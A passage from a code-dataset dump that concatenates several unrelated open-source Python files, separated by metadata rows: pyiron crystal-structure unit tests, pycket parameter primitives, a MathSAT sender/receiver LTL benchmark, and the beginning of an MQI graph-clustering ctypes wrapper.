    basis_Mg = CrystalStructure("Mg", bravais_basis="fcc", lattice_constant=4.2)
    basis_Mg.set_repeat(3)
    basis_Mg[:-3] = "Al"
    self.assertEqual(basis_Mg.get_chemical_formula(), 'Al105Mg3')
    basis_Mg[4:-len(basis_Mg)+7] = "C"
    self.assertEqual(basis_Mg.get_chemical_formula(), 'Al102C3Mg3')
    basis_Mg[4:] = "C"
    self.assertEqual(basis_Mg.get_chemical_formula(), 'Al4C104')
    basis_Mg[:] = "Mg"
    self.assertEqual(basis_Mg.get_chemical_formula(), 'Mg108')
    basis_Mg[::2] = "Al"
    self.assertEqual(basis_Mg.get_chemical_formula(), 'Al54Mg54')
    # replacing every atom step by step collapses back to one species
    struct = CrystalStructure("Al", bravais_basis="fcc", lattice_constant=4.2, bravais_lattice="cubic")
    struct[0] = 'Mg'
    self.assertEqual(struct.get_chemical_formula(), 'Al3Mg')
    struct[1] = 'Cu'
    self.assertEqual(struct.get_chemical_formula(), 'Al2CuMg')
    struct[0] = 'Cu'
    struct[1] = 'Cu'
    struct[2] = 'Cu'
    struct[3] = 'Cu'
    self.assertEqual(struct.get_chemical_formula(), 'Cu4')
    # full-slice assignment to a brand-new species
    struct = CrystalStructure("Al", bravais_basis="fcc", lattice_constant=4.2, bravais_lattice="cubic")
    struct[0] = 'Mg'
    self.assertEqual(struct.get_chemical_formula(), 'Al3Mg')
    struct[1] = 'Cu'
    self.assertEqual(struct.get_chemical_formula(), 'Al2CuMg')
    struct[0:] = 'N'
    self.assertEqual(struct.get_chemical_formula(), 'N4')
    # full-slice assignment to a species already present (Cu)
    struct = CrystalStructure("Al", bravais_basis="fcc", lattice_constant=4.2, bravais_lattice="cubic")
    struct[0] = 'Mg'
    self.assertEqual(struct.get_chemical_formula(), 'Al3Mg')
    struct[1] = 'Cu'
    self.assertEqual(struct.get_chemical_formula(), 'Al2CuMg')
    struct[0:] = 'Cu'
    self.assertEqual(struct.get_chemical_formula(), 'Cu4')
    # ... and to another species already present (Mg)
    struct = CrystalStructure("Al", bravais_basis="fcc", lattice_constant=4.2, bravais_lattice="cubic")
    struct[0] = 'Mg'
    self.assertEqual(struct.get_chemical_formula(), 'Al3Mg')
    struct[1] = 'Cu'
    self.assertEqual(struct.get_chemical_formula(), 'Al2CuMg')
    struct[0:] = 'Mg'
    self.assertEqual(struct.get_chemical_formula(), 'Mg4')
def test_static_functions(self):
    """Structure-factory helpers (ase_bulk, surface, surface_hkl) return
    pyiron Atoms with the expected pbc flags; center=True centers the
    slab in the cell along z."""
    Al_bulk = self.struct_factory.ase_bulk("Al")
    self.assertIsInstance(Al_bulk, Atoms)
    self.assertTrue(all(Al_bulk.pbc))
    # default surface is fully periodic
    surface = self.struct_factory.surface("Al", "fcc111", size=(4, 4, 4), vacuum=10)
    self.assertTrue(all(surface.pbc))
    # an explicit pbc argument is honoured per direction
    surface = self.struct_factory.surface("Al", "fcc111", size=(4, 4, 4), vacuum=10, pbc=[True, True, False])
    self.assertTrue(all(surface.pbc[0:2]))
    self.assertFalse(surface.pbc[2])
    self.assertIsInstance(surface, Atoms)
    hkl_surface = self.struct_factory.surface_hkl(Al_bulk, [10, 8, 7], layers=20, vacuum=10)
    self.assertIsInstance(hkl_surface, Atoms)
    self.assertTrue(all(hkl_surface.pbc))
    # center=True puts the slab's mean z at half the cell height
    hkl_surface_center = self.struct_factory.surface_hkl(
        Al_bulk, [10, 8, 7], layers=20, vacuum=10, center=True
    )
    mean_z = np.mean([p[2] for p in hkl_surface_center.positions])
    self.assertAlmostEqual(mean_z, hkl_surface_center.cell[2][2]/2)
def test_non_periodic(self):
    """repeat() produces the same positions regardless of pbc flags, and
    get_scaled_positions() works (warning-free) with and without a cell."""
    structure = CrystalStructure("Fe", bravais_basis="bcc", lattice_constant=4.2)
    pos = structure.repeat([1, 1, 2]).positions.copy()
    structure = CrystalStructure("Fe", bravais_basis="bcc", lattice_constant=4.2)
    structure.pbc = [False, False, True]
    pos_new = structure.repeat([1, 1, 2]).positions.copy()
    self.assertTrue(np.allclose(pos, pos_new))
    # scaled positions without a cell ...
    c3 = Atoms("C3", positions=[[0, 0, 0], [0, 0, 2], [0, 2, 0]])
    c3.get_scaled_positions()
    # ... and with a cell
    c3 = Atoms("C3", positions=[[0, 0, 0], [0, 0, 2], [0, 2, 0]], cell=np.eye(3)*10)
    c3.get_scaled_positions()
    with warnings.catch_warnings(record=True) as w:
        warnings.simplefilter("always")
        # must not emit any warning when a cell is present
        c3.get_scaled_positions()
        self.assertEqual(len(w), 0)
def test_get_wrapped_coordinates(self):
    """Coordinates just outside the cell wrap back by one period."""
    bcc = CrystalStructure("Fe", bravais_basis="bcc", lattice_constant=4.2, pbc=True)
    # points at 1.1 * cell must wrap back to 0.1 * cell under PBC
    wrapped = bcc.get_wrapped_coordinates(bcc.cell * 1.1)
    residual = np.linalg.norm(wrapped - bcc.cell * 0.1)
    self.assertAlmostEqual(residual, 0)
def generate_fcc_lattice(a=4.2):
    """Return the one-atom basis and primitive cell of an fcc lattice.

    Args:
        a (float): cubic lattice constant.

    Returns:
        tuple: (positions, cell) where positions is [[0, 0, 0]] and cell
            is the 3x3 primitive fcc cell (zero diagonal, a/2 off-diagonal).
    """
    half_a = 0.5 * a
    cell = half_a * (np.ones((3, 3)) - np.eye(3))
    return [[0, 0, 0]], cell
# Allow running this test module directly from the command line.
if __name__ == "__main__":
    unittest.main()
| 45.289855 | 119 | 0.602822 |
45ffb9629bab3fe646b41127ac7dd133c3abc177 | 2,101 | py | Python | pycket/prims/parameter.py | krono/pycket | 5eff3401ce5cf34b16863b669ac9e274edabbe00 | [
"MIT"
] | null | null | null | pycket/prims/parameter.py | krono/pycket | 5eff3401ce5cf34b16863b669ac9e274edabbe00 | [
"MIT"
] | null | null | null | pycket/prims/parameter.py | krono/pycket | 5eff3401ce5cf34b16863b669ac9e274edabbe00 | [
"MIT"
] | null | null | null |
from pycket import values
from pycket import values_parameter
from pycket.base import W_Object
from pycket.error import SchemeException
from pycket.prims.expose import expose, expose_val, default, procedure
@expose("make-parameter",
        [values.W_Object, default(values.W_Object, values.w_false)])
def make_parameter(init, guard):
    # Racket's make-parameter: wrap the initial value and the optional
    # guard procedure (defaulting to #f) in a fresh parameter object.
    return values_parameter.W_Parameter(init, guard)
@expose("make-derived-parameter",
        [values_parameter.W_BaseParameter, procedure, procedure])
def make_derived_parameter(param, guard, wrap):
    # Racket's make-derived-parameter: derive from an existing parameter,
    # applying `guard` on assignment and `wrap` on lookup.
    return values_parameter.W_DerivedParameter(param, guard, wrap)
@expose("extend-parameterization",
        [values.W_Object, values.W_Object, values.W_Object])
def extend_paramz(paramz, key, val):
    """Extend a parameterization with a single key/value binding.

    Raises SchemeException when `key` is not a parameter. A first
    argument that is not a parameterization is returned untouched.
    """
    if not isinstance(key, values_parameter.W_BaseParameter):
        raise SchemeException("Not a parameter: " + key.tostring())
    if not isinstance(paramz, values_parameter.W_Parameterization):
        # This really is the Racket behavior
        return paramz
    return paramz.extend([key], [val])
def call_with_parameterization(f, args, paramz, env, cont):
    # Install `paramz` as the current parameterization on the continuation
    # mark stack, then tail-call f with the given arguments.
    cont.update_cm(values.parameterization_key, paramz)
    return f.call(args, env, cont)
@expose("call-with-parameterization",
        [values.W_Object, values_parameter.W_Parameterization], simple=False)
def call_w_paramz(f, paramz, env, cont):
    # Racket's call-with-parameterization: thunk `f` is invoked with no
    # arguments under the given parameterization.
    return call_with_parameterization(f, [], paramz, env, cont)
def call_with_extended_paramz(f, args, keys, vals, env, cont):
    """Call `f` under the current parameterization extended by keys/vals.

    The current parameterization is looked up on the continuation's mark
    stack before being extended.
    """
    from pycket.values import parameterization_key
    # XXX seems untested?
    current = cont.get_mark_first(parameterization_key)
    # XXX is this always right?
    assert isinstance(current, values_parameter.W_Parameterization)
    extended = current.extend(keys, vals)
    return call_with_parameterization(f, args, extended, env, cont)
# Module-level bindings exported to the Racket namespace: the
# parameterization key and the two print-control parameters.
expose_val("parameterization-key", values.parameterization_key)
expose_val("print-mpair-curly-braces", values_parameter.W_Parameter(values.w_false))
expose_val("print-pair-curly-braces", values_parameter.W_Parameter(values.w_false))
| 42.02 | 94 | 0.750595 |
10b57a42f6656b3d0d27d772027c6b280a0ede19 | 18,603 | py | Python | benchmarks/f3_wrong_hints/scaling_ltl_timed_transition_system/15-sender_receiver_39.py | EnricoMagnago/F3 | c863215c318d7d5f258eb9be38c6962cf6863b52 | [
"MIT"
] | 3 | 2021-04-23T23:29:26.000Z | 2022-03-23T10:00:30.000Z | benchmarks/f3_wrong_hints/scaling_ltl_timed_transition_system/15-sender_receiver_39.py | EnricoMagnago/F3 | c863215c318d7d5f258eb9be38c6962cf6863b52 | [
"MIT"
] | null | null | null | benchmarks/f3_wrong_hints/scaling_ltl_timed_transition_system/15-sender_receiver_39.py | EnricoMagnago/F3 | c863215c318d7d5f258eb9be38c6962cf6863b52 | [
"MIT"
] | 1 | 2021-11-17T22:02:56.000Z | 2021-11-17T22:02:56.000Z | from typing import FrozenSet
from collections import Iterable
from math import log, ceil
from mathsat import msat_term, msat_env
from mathsat import msat_make_constant, msat_declare_function
from mathsat import msat_get_integer_type, msat_get_rational_type, msat_get_bool_type
from mathsat import msat_make_and, msat_make_not, msat_make_or, msat_make_iff
from mathsat import msat_make_leq, msat_make_equal, msat_make_true
from mathsat import msat_make_number, msat_make_plus, msat_make_times
from pysmt.environment import Environment as PysmtEnv
import pysmt.typing as types
from ltl.ltl import TermMap, LTLEncoder
from utils import name_next, symb_to_next
from hint import Hint, Location
delta_name = "delta"
def decl_consts(menv: msat_env, name: str, c_type) -> tuple:
    """Declare a constant and its primed (next-state) copy in `menv`.

    Names starting with '_' are reserved and rejected. Returns the pair
    (current, next) of MathSAT constant terms.
    """
    assert not name.startswith("_"), name
    curr = msat_make_constant(menv, msat_declare_function(menv, name, c_type))
    nxt = msat_make_constant(
        menv, msat_declare_function(menv, name_next(name), c_type))
    return curr, nxt
def make_enum(menv, v_name: str, enum_size: int):
    """Boolean-encode an enum with `enum_size` values.

    Declares ceil(log2(enum_size)) boolean constants (current and next
    state) named "<v_name><idx>" and, for every enum value, builds the
    conjunction of (possibly negated) bits matching its binary encoding.

    Returns (b_vars, vals, x_vals): the list of (curr, next) bit pairs
    and, for each enum value, the predicate over current-state and over
    next-state bits.
    """
    bool_type = msat_get_bool_type(menv)
    num_bits = ceil(log(enum_size, 2))
    b_vars = []
    for idx in range(num_bits):
        c_name = "{}{}".format(v_name, idx)
        b_vars.append(tuple(decl_consts(menv, c_name, bool_type)))
    vals = []
    x_vals = []
    for enum_val in range(enum_size):
        # binary string of the value, zero-padded to num_bits
        bit_val = format(enum_val, '0{}b'.format(num_bits))
        assert len(bit_val) == num_bits
        assert all(c in {'0', '1'} for c in bit_val)
        # bit '1' keeps the variable, bit '0' negates it; the string is
        # reversed so list index 0 is the least-significant bit
        assign = [b_vars[idx] if c == '1' else
                  (msat_make_not(menv, b_vars[idx][0]),
                   msat_make_not(menv, b_vars[idx][1]))
                  for idx, c in enumerate(reversed(bit_val))]
        pred = assign[0][0]
        x_pred = assign[0][1]
        for it in assign[1:]:
            pred = msat_make_and(menv, pred, it[0])
            x_pred = msat_make_and(menv, x_pred, it[1])
        vals.append(pred)
        x_vals.append(x_pred)
    assert len(vals) == enum_size
    assert len(x_vals) == enum_size
    return b_vars, vals, x_vals
def msat_make_minus(menv: msat_env, arg0: msat_term, arg1: msat_term):
    """Encode arg0 - arg1 as arg0 + (-1) * arg1."""
    neg_arg1 = msat_make_times(menv, arg1, msat_make_number(menv, "-1"))
    return msat_make_plus(menv, arg0, neg_arg1)
def msat_make_lt(menv: msat_env, arg0: msat_term, arg1: msat_term):
    """Encode arg0 < arg1 as the negation of arg0 >= arg1."""
    return msat_make_not(menv, msat_make_geq(menv, arg0, arg1))
def msat_make_geq(menv: msat_env, arg0: msat_term, arg1: msat_term):
    # arg0 >= arg1 is encoded as arg1 <= arg0 (MathSAT only provides leq).
    return msat_make_leq(menv, arg1, arg0)
def msat_make_gt(menv: msat_env, arg0: msat_term, arg1: msat_term):
    """Encode arg0 > arg1 as the negation of arg0 <= arg1."""
    return msat_make_not(menv, msat_make_leq(menv, arg0, arg1))
def msat_make_impl(menv: msat_env, arg0: msat_term, arg1: msat_term):
    """Encode the implication arg0 -> arg1 as !arg0 | arg1."""
    return msat_make_or(menv, msat_make_not(menv, arg0), arg1)
def diverging_symbs(menv: msat_env) -> frozenset:
    """Return the symbols required to diverge: the time-elapse `delta`."""
    real_type = msat_get_rational_type(menv)
    delta = msat_make_constant(
        menv, msat_declare_function(menv, delta_name, real_type))
    return frozenset([delta])
def check_ltl(menv: msat_env, enc: LTLEncoder) -> (Iterable, msat_term,
                                                  msat_term, msat_term):
    """Build the sender/receiver timed transition system and LTL property.

    Returns (curr2next map, init, trans, ltl). The property is
    (G F !s.stutter) -> G (s.wait_ack -> F s.send): if the sender moves
    infinitely often, every wait_ack is eventually followed by a send.
    """
    assert menv
    assert isinstance(menv, msat_env)
    assert enc
    assert isinstance(enc, LTLEncoder)
    int_type = msat_get_integer_type(menv)
    real_type = msat_get_rational_type(menv)
    # shared channels: receiver->sender and sender->receiver, plus delta
    r2s, x_r2s = decl_consts(menv, "r2s", int_type)
    s2r, x_s2r = decl_consts(menv, "s2r", int_type)
    delta, x_delta = decl_consts(menv, delta_name, real_type)
    sender = Sender("s", menv, enc, r2s, x_r2s, s2r, x_s2r, delta)
    receiver = Receiver("r", menv, enc, s2r, x_s2r, r2s, x_r2s, delta)
    curr2next = {r2s: x_r2s, s2r: x_s2r, delta: x_delta}
    for comp in [sender, receiver]:
        for s, x_s in comp.symb2next.items():
            curr2next[s] = x_s
    zero = msat_make_number(menv, "0")
    init = msat_make_and(menv, receiver.init, sender.init)
    trans = msat_make_and(menv, receiver.trans, sender.trans)
    # invar delta >= 0
    init = msat_make_and(menv, init,
                         msat_make_geq(menv, delta, zero))
    trans = msat_make_and(menv, trans,
                          msat_make_geq(menv, x_delta, zero))
    # delta > 0 -> (r2s' = r2s & s2r' = s2r): channels frozen while time elapses
    lhs = msat_make_gt(menv, delta, zero)
    rhs = msat_make_and(menv,
                        msat_make_equal(menv, x_r2s, r2s),
                        msat_make_equal(menv, x_s2r, s2r))
    trans = msat_make_and(menv, trans,
                          msat_make_impl(menv, lhs, rhs))
    # (G F !s.stutter) -> G (s.wait_ack -> F s.send)
    lhs = enc.make_G(enc.make_F(msat_make_not(menv, sender.stutter)))
    rhs = enc.make_G(msat_make_impl(menv, sender.wait_ack,
                                    enc.make_F(sender.send)))
    ltl = msat_make_impl(menv, lhs, rhs)
    return TermMap(curr2next), init, trans, ltl
class Module:
    """Base class for a component of the timed transition system.

    Holds the MathSAT environment, the LTL encoder, the symbol->next-symbol
    map, and the component's `init`/`trans` formulas (both start as true).
    Subclasses declare their variables via `_symb`/`_enum`, which prefix
    names with the component name.
    """

    def __init__(self, name: str, menv: msat_env, enc: LTLEncoder,
                 *args, **kwargs):
        self.name = name
        self.menv = menv
        self.enc = enc
        self.symb2next = {}
        true = msat_make_true(menv)
        self.init = true
        self.trans = true

    def _symb(self, v_name, v_type):
        # declare "<component>_<v_name>" together with its next-state copy
        return decl_consts(self.menv,
                           "{}_{}".format(self.name, v_name), v_type)

    def _enum(self, v_name: str, enum_size: int):
        # declare a boolean-encoded enum named "<component>_<v_name>"
        return make_enum(self.menv,
                         "{}_{}".format(self.name, v_name), enum_size)
class Sender(Module):
    """Sender of the timed sender/receiver protocol.

    Locations: `send` / `wait_ack` (encoded in one boolean `l`); `c` is a
    clock compared against `timeout`, `msg_id` the id of the message in
    flight, and the event bit `evt` distinguishes discrete moves from
    stuttering. `in_c`/`out_c` are the receiver->sender and
    sender->receiver channels.
    """

    def __init__(self, name: str, menv: msat_env, enc: LTLEncoder,
                 in_c, x_in_c, out_c, x_out_c, delta):
        super().__init__(name, menv, enc)
        bool_type = msat_get_bool_type(menv)
        int_type = msat_get_integer_type(menv)
        real_type = msat_get_rational_type(menv)
        loc, x_loc = self._symb("l", bool_type)
        evt, x_evt = self._symb("evt", bool_type)
        msg_id, x_msg_id = self._symb("msg_id", int_type)
        timeout, x_timeout = self._symb("timeout", real_type)
        c, x_c = self._symb("c", real_type)
        # event bit: move vs stutter (current and next state)
        self.move = evt
        self.stutter = msat_make_not(menv, evt)
        self.x_move = x_evt
        self.x_stutter = msat_make_not(menv, x_evt)
        # location bit: send vs wait_ack (current and next state)
        self.send = loc
        self.wait_ack = msat_make_not(menv, loc)
        self.x_send = x_loc
        self.x_wait_ack = msat_make_not(menv, x_loc)
        self.symb2next = {loc: x_loc, evt: x_evt, msg_id: x_msg_id,
                          timeout: x_timeout, c: x_c}
        zero = msat_make_number(menv, "0")
        one = msat_make_number(menv, "1")
        base_timeout = one
        # send & c = 0 & msg_id = 0
        self.init = msat_make_and(menv,
                                  msat_make_and(menv, self.send,
                                                msat_make_equal(menv, c,
                                                                zero)),
                                  msat_make_equal(menv, msg_id, zero))
        # invar: wait_ack -> c <= timeout
        self.init = msat_make_and(
            menv, self.init,
            msat_make_impl(menv, self.wait_ack,
                           msat_make_leq(menv, c, timeout)))
        self.trans = msat_make_impl(menv, self.x_wait_ack,
                                    msat_make_leq(menv, x_c, x_timeout))
        # delta > 0 | stutter -> l' = l & msg_id' = msg_id & timeout' = timeout &
        # c' = c + delta & out_c' = out_c
        lhs = msat_make_or(menv, msat_make_gt(menv, delta, zero), self.stutter)
        rhs = msat_make_and(
            menv,
            msat_make_and(menv,
                          msat_make_iff(menv, x_loc, loc),
                          msat_make_equal(menv, x_msg_id, msg_id)),
            msat_make_and(menv,
                          msat_make_equal(menv, x_timeout, timeout),
                          msat_make_equal(menv, x_c,
                                          msat_make_plus(menv, c, delta))))
        rhs = msat_make_and(menv, rhs,
                            msat_make_equal(menv, x_out_c, out_c))
        self.trans = msat_make_and(menv, self.trans,
                                   msat_make_impl(menv, lhs, rhs))
        # discrete transition: a move with zero time elapse
        disc_t = msat_make_and(menv, self.move,
                               msat_make_equal(menv, delta, zero))
        # (send & send') ->
        # (msg_id' = msg_id & timeout' = base_timeout & c' = 0 & out_c' = out_c)
        lhs = msat_make_and(menv, disc_t,
                            msat_make_and(menv, self.send, self.x_send))
        rhs = msat_make_and(
            menv,
            msat_make_and(menv,
                          msat_make_equal(menv, x_msg_id, msg_id),
                          msat_make_equal(menv, x_timeout, base_timeout)),
            msat_make_and(menv,
                          msat_make_equal(menv, x_c, zero),
                          msat_make_equal(menv, x_out_c, out_c)))
        self.trans = msat_make_and(menv, self.trans,
                                   msat_make_impl(menv, lhs, rhs))
        # (send & wait_ack') ->
        # (msg_id' = msg_id + 1 & timeout' = base_timeout & c' = 0 & out_c' = out_c)
        lhs = msat_make_and(menv, disc_t,
                            msat_make_and(menv, self.send, self.x_wait_ack))
        rhs = msat_make_and(
            menv,
            msat_make_and(menv,
                          msat_make_equal(menv, x_msg_id,
                                          msat_make_plus(menv, msg_id, one)),
                          msat_make_equal(menv, x_timeout, base_timeout)),
            msat_make_and(menv,
                          msat_make_equal(menv, x_c, zero),
                          msat_make_equal(menv, x_out_c, out_c)))
        self.trans = msat_make_and(menv, self.trans,
                                   msat_make_impl(menv, lhs, rhs))
        # (wait_ack) -> (c' = 0 & out_c' = out_c &
        # (wait_ack' <-> (in_c != msg_id & c > timeout))
        lhs = msat_make_and(menv, disc_t, self.wait_ack)
        rhs_iff = msat_make_and(menv,
                                msat_make_not(menv,
                                              msat_make_equal(menv, in_c,
                                                              msg_id)),
                                msat_make_geq(menv, c, timeout))
        rhs_iff = msat_make_iff(menv, self.x_wait_ack, rhs_iff)
        rhs = msat_make_and(menv,
                            msat_make_and(menv,
                                          msat_make_equal(menv, x_c, zero),
                                          msat_make_equal(menv, x_out_c,
                                                          out_c)),
                            rhs_iff)
        self.trans = msat_make_and(menv, self.trans,
                                   msat_make_impl(menv, lhs, rhs))
        # (wait_ack & wait_ack') -> (timeout' > timeout): exponential-style backoff
        lhs = msat_make_and(menv, disc_t,
                            msat_make_and(menv, self.wait_ack,
                                          self.x_wait_ack))
        rhs = msat_make_gt(menv, x_timeout, timeout)
        self.trans = msat_make_and(menv, self.trans,
                                   msat_make_impl(menv, lhs, rhs))
        # (wait_ack) -> (send' <-> (in_c = msg_id & c < timeout))
        lhs = msat_make_and(menv, disc_t, self.wait_ack)
        rhs = msat_make_iff(menv, self.x_send,
                            msat_make_and(menv,
                                          msat_make_equal(menv, in_c, msg_id),
                                          msat_make_lt(menv, c, timeout)))
        self.trans = msat_make_and(menv, self.trans,
                                   msat_make_impl(menv, lhs, rhs))
        # (wait_ack & send') -> (timeout' = base_timeout): reset after an ack
        lhs = msat_make_and(menv, disc_t,
                            msat_make_and(menv, self.wait_ack, self.x_send))
        rhs = msat_make_equal(menv, x_timeout, base_timeout)
        self.trans = msat_make_and(menv, self.trans,
                                   msat_make_impl(menv, lhs, rhs))
class Receiver(Module):
    """Receiver of the timed sender/receiver protocol.

    Two locations, `wait` / `work`, encoded in one boolean `l`. It acks a
    newly seen message id by copying the input channel to the output
    channel when moving from wait to work.
    """

    def __init__(self, name: str, menv: msat_env, enc: LTLEncoder,
                 in_c, x_in_c, out_c, x_out_c, delta):
        super().__init__(name, menv, enc)
        bool_type = msat_get_bool_type(menv)
        loc, x_loc = self._symb("l", bool_type)
        self.wait = loc
        self.work = msat_make_not(menv, loc)
        self.x_wait = x_loc
        self.x_work = msat_make_not(menv, x_loc)
        self.symb2next = {loc: x_loc}
        zero = msat_make_number(menv, "0")
        # wait
        self.init = self.wait
        # delta > 0 -> loc' = loc & out_c' = out_c  (frozen while time elapses)
        lhs = msat_make_gt(menv, delta, zero)
        rhs = msat_make_and(menv,
                            msat_make_iff(menv, x_loc, loc),
                            msat_make_equal(menv, x_out_c, out_c))
        self.trans = msat_make_impl(menv, lhs, rhs)
        # discrete transition: zero time elapse
        disc_t = msat_make_equal(menv, delta, zero)
        # wait -> (wait' <-> in_c = out_c): stay waiting while already acked
        lhs = msat_make_and(menv, disc_t, self.wait)
        rhs = msat_make_iff(menv, self.x_wait,
                            msat_make_equal(menv, in_c, out_c))
        self.trans = msat_make_and(menv, self.trans,
                                   msat_make_impl(menv, lhs, rhs))
        # (wait & wait') -> (out_c' = out_c)
        lhs = msat_make_and(menv, disc_t,
                            msat_make_and(menv, self.wait, self.x_wait))
        rhs = msat_make_equal(menv, x_out_c, out_c)
        self.trans = msat_make_and(menv, self.trans,
                                   msat_make_impl(menv, lhs, rhs))
        # (wait & work') -> out_c' = in_c: acknowledge the new message id
        lhs = msat_make_and(menv, disc_t,
                            msat_make_and(menv, self.wait, self.x_work))
        rhs = msat_make_equal(menv, x_out_c, in_c)
        self.trans = msat_make_and(menv, self.trans,
                                   msat_make_impl(menv, lhs, rhs))
        # work -> out_c' = out_c
        lhs = msat_make_and(menv, disc_t, self.work)
        rhs = msat_make_equal(menv, x_out_c, out_c)
        self.trans = msat_make_and(menv, self.trans,
                                   msat_make_impl(menv, lhs, rhs))
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
    """Build the set of (deliberately weak/wrong) hints for this benchmark.

    Declares the system symbols in pysmt and returns one- and two-location
    Hint automata over single symbols.

    Bug fix: `s2r` was declared as mgr.Symbol("r2s", ...), aliasing it to
    the `r2s` symbol, so every s2r hint actually ranged over r2s and the
    symbol set collapsed the two channels into one.  `check_ltl` declares
    distinct constants "s2r" and "r2s"; the pysmt declaration now matches.
    """
    assert isinstance(env, PysmtEnv)
    mgr = env.formula_manager
    delta = mgr.Symbol(delta_name, types.REAL)
    r2s = mgr.Symbol("r2s", types.INT)
    s2r = mgr.Symbol("s2r", types.INT)
    s_l = mgr.Symbol("s_l", types.BOOL)
    s_evt = mgr.Symbol("s_evt", types.BOOL)
    s_msg_id = mgr.Symbol("s_msg_id", types.INT)
    s_timeout = mgr.Symbol("s_timeout", types.REAL)
    s_c = mgr.Symbol("s_c", types.REAL)
    r_l = mgr.Symbol("r_l", types.BOOL)
    symbs = frozenset([delta, r2s, s2r, s_l, s_evt, s_msg_id, s_timeout, s_c,
                       r_l])
    x_delta = symb_to_next(mgr, delta)
    x_r2s = symb_to_next(mgr, r2s)
    x_s2r = symb_to_next(mgr, s2r)
    x_s_l = symb_to_next(mgr, s_l)
    x_s_evt = symb_to_next(mgr, s_evt)
    x_s_msg_id = symb_to_next(mgr, s_msg_id)
    x_s_timeout = symb_to_next(mgr, s_timeout)
    x_s_c = symb_to_next(mgr, s_c)
    x_r_l = symb_to_next(mgr, r_l)
    res = []
    r0 = mgr.Real(0)
    r1 = mgr.Real(1)
    i0 = mgr.Int(0)
    i1 = mgr.Int(1)
    # single-location hints that keep a symbol constant
    loc0 = Location(env, mgr.Equals(s2r, i0))
    loc0.set_progress(0, mgr.Equals(x_s2r, i0))
    hint = Hint("h_s2r0", env, frozenset([s2r]), symbs)
    hint.set_locs([loc0])
    res.append(hint)
    loc0 = Location(env, s_l)
    loc0.set_progress(0, x_s_l)
    hint = Hint("h_s_l0", env, frozenset([s_l]), symbs)
    hint.set_locs([loc0])
    res.append(hint)
    loc0 = Location(env, s_evt)
    loc0.set_progress(0, x_s_evt)
    hint = Hint("h_s_evt0", env, frozenset([s_evt]), symbs)
    hint.set_locs([loc0])
    res.append(hint)
    loc0 = Location(env, mgr.Equals(s_msg_id, i0))
    loc0.set_progress(0, mgr.Equals(x_s_msg_id, i0))
    hint = Hint("h_s_msg_id0", env, frozenset([s_msg_id]), symbs)
    hint.set_locs([loc0])
    res.append(hint)
    loc0 = Location(env, mgr.Equals(s_timeout, r0))
    loc0.set_progress(0, mgr.Equals(x_s_timeout, r0))
    hint = Hint("h_s_timeout0", env, frozenset([s_timeout]), symbs)
    hint.set_locs([loc0])
    res.append(hint)
    loc0 = Location(env, mgr.Equals(s_c, r0))
    loc0.set_progress(0, mgr.Equals(x_s_c, r0))
    hint = Hint("h_s_c0", env, frozenset([s_c]), symbs)
    hint.set_locs([loc0])
    res.append(hint)
    loc0 = Location(env, r_l)
    loc0.set_progress(0, x_r_l)
    hint = Hint("h_r_l0", env, frozenset([r_l]), symbs)
    hint.set_locs([loc0])
    res.append(hint)
    # hints forcing a fixed next value
    loc0 = Location(env, mgr.GE(delta, r0))
    loc0.set_progress(0, mgr.Equals(x_delta, r1))
    hint = Hint("h_delta1", env, frozenset([delta]), symbs)
    hint.set_locs([loc0])
    res.append(hint)
    loc0 = Location(env, mgr.GE(s2r, i0))
    loc0.set_progress(0, mgr.Equals(x_s2r, i1))
    hint = Hint("h_s2r1", env, frozenset([s2r]), symbs)
    hint.set_locs([loc0])
    res.append(hint)
    # two-location hints alternating a boolean
    loc0 = Location(env, s_l)
    loc0.set_progress(1, mgr.Not(x_s_l))
    loc1 = Location(env, mgr.Not(s_l))
    loc1.set_progress(0, x_s_l)
    hint = Hint("h_s_l1", env, frozenset([s_l]), symbs)
    hint.set_locs([loc0, loc1])
    res.append(hint)
    loc0 = Location(env, s_evt)
    loc0.set_progress(1, mgr.Not(x_s_evt))
    loc1 = Location(env, mgr.Not(s_evt))
    loc1.set_progress(0, x_s_evt)
    hint = Hint("h_s_evt1", env, frozenset([s_evt]), symbs)
    hint.set_locs([loc0, loc1])
    res.append(hint)
    # hints that monotonically increase a symbol
    loc0 = Location(env, mgr.GE(s_timeout, r0))
    loc0.set_progress(0, mgr.Equals(x_s_timeout, mgr.Plus(s_timeout, r1)))
    hint = Hint("h_s_timeout1", env, frozenset([s_timeout]), symbs)
    hint.set_locs([loc0])
    res.append(hint)
    loc0 = Location(env, mgr.GE(s_c, r0))
    loc0.set_progress(0, mgr.Equals(x_s_c, mgr.Plus(s_c, r1)))
    hint = Hint("h_s_c1", env, frozenset([s_c]), symbs)
    hint.set_locs([loc0])
    res.append(hint)
    loc0 = Location(env, r_l)
    loc0.set_progress(1, mgr.Not(x_r_l))
    loc1 = Location(env, mgr.Not(r_l))
    loc1.set_progress(0, x_r_l)
    hint = Hint("h_r_l1", env, frozenset([r_l]), symbs)
    hint.set_locs([loc0, loc1])
    res.append(hint)
    loc0 = Location(env, mgr.GE(s2r, i0))
    loc0.set_progress(0, mgr.Equals(x_s2r, mgr.Plus(s2r, i1)))
    hint = Hint("h_s2r2", env, frozenset([s2r]), symbs)
    hint.set_locs([loc0])
    res.append(hint)
    return frozenset(res)
| 38.277778 | 89 | 0.576627 |
dd9a967b300e22b668f2ceb25f30a107110059fa | 2,735 | py | Python | localgraphclustering/cpp/MQI_cpp.py | vishalbelsare/LocalGraphClustering | a6325350997932d548a876deb259c2387fc2c809 | [
"MIT"
] | 106 | 2017-09-06T04:47:02.000Z | 2022-03-30T07:43:27.000Z | localgraphclustering/cpp/MQI_cpp.py | pmacg/local-bipartite-clusters | d29e8d37c79e27b48e785b7b2c4bad9ea5d66b6d | [
"MIT"
] | 51 | 2017-09-06T02:22:09.000Z | 2021-12-15T11:39:28.000Z | localgraphclustering/cpp/MQI_cpp.py | vishalbelsare/LocalGraphClustering | a6325350997932d548a876deb259c2387fc2c809 | [
"MIT"
] | 38 | 2017-09-04T21:45:13.000Z | 2022-01-19T09:48:25.000Z | # A python wrapper for MQI
# ai,aj - graph in CSR
# n - number of nodes in the graph
# R - seed set
# nR - number of nodes in seed set
# actual_length - number of nodes in the optimal subset
# ret_set - optimal subset with the smallest conductance
from operator import itemgetter
import numpy as np
from numpy.ctypeslib import ndpointer
import ctypes
from .utility import determine_types, standard_types
from . import _graphlib
# Load the functions
def _setup_MQI_args(vtypestr, itypestr, fun):
    """Configure the ctypes signature of one compiled MQI entry point.

    Sets ``restype``/``argtypes`` on *fun* (an exported ``_graphlib`` symbol)
    for the given vertex/index dtype names and returns the configured function.
